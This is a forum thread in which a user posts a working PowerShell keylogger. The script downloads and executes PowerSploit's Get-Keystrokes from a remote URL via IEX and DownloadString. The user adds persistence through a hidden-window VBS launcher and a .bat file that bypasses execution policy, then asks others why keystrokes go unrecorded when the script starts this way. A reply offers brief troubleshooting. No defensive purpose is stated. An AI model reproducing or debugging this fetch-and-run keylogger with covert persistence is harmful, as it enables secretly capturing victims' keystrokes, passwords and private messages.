codeeer Posted March 26, 2017 Share Posted March 26, 2017 Hi So I have this simple script, keylogger.ps1 $time = Get-Date -format "yyyy-MM-dd_HH-mm" $folder = $ENV:UserProfile $folder += '\Desktop\' + $time + '_keystrokes.txt' IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') Get-Keystrokes -LogPath $folder It gets the powershell keylogger and execute it. Creating a log file on the desktop with year and day. This works fine when I run ./keylogger.ps1 from powershell Then I tried to add some persistence so it start with the computer, so I added this: updater.vbs script: Set objShell = CreateObject("Wscript.shell") objShell.run("powershell -WindowStyle Hidden -executionpolicy bypass -file C:\Users\user\Desktop\keylogger.ps1") The code is executed, but key strokes are not captured!! Same thing here, I run the script via a .bat file @echo off PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\Users\user\Desktop\keylogger.ps1'" The code is executed, file is created for logging key strokes, but no key strokes are captured!! Anybody know why this is? Quote Link to comment Share on other sites More sharing options...
Decoy Posted March 26, 2017 Share Posted March 26, 2017 Have you tried running PowerShell as Administrator? Quote Link to comment Share on other sites More sharing options...
codeeer Posted March 27, 2017 Author Share Posted March 27, 2017 10 hours ago, Decoy said: Have you tried running PowerShell as Administrator? It works when I run in PowerShell without being admin ./keylogger.ps1 Do you mean running the script as Administrator? How can I do that in code? Quote Link to comment Share on other sites More sharing options...
Decoy Posted March 27, 2017 Share Posted March 27, 2017 I think in newer versions of Powershell running scripts is turned off by default. I think you have to turn it on first. Do you know what version of Powershell you are testing on? Quote Link to comment Share on other sites More sharing options...
codeeer Posted March 27, 2017 Author Share Posted March 27, 2017 9 minutes ago, Decoy said: I think in newer versions of Powershell running scripts is turned off by default. I think you have to turn it on first. Do you know what version of Powershell you are testing on? So, to be clear, the script does run. Both the .vbs script and the .bat file runs the PowerShell script "keylogger.ps1". I know this because the first part of the powershell script works fine, it creates a empty file for logging keystrokes. The problem is that the keystrokes are not being registered when the powershell script is executed via a .bat script or a .vbs script. The keystrokes are registed if I run keylogger.ps1 via the powershell terminal, but NOT when I execute the keylogger.ps1 script via .bat or .vbs scripts. So, my question is, has anyone gotten this to work? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.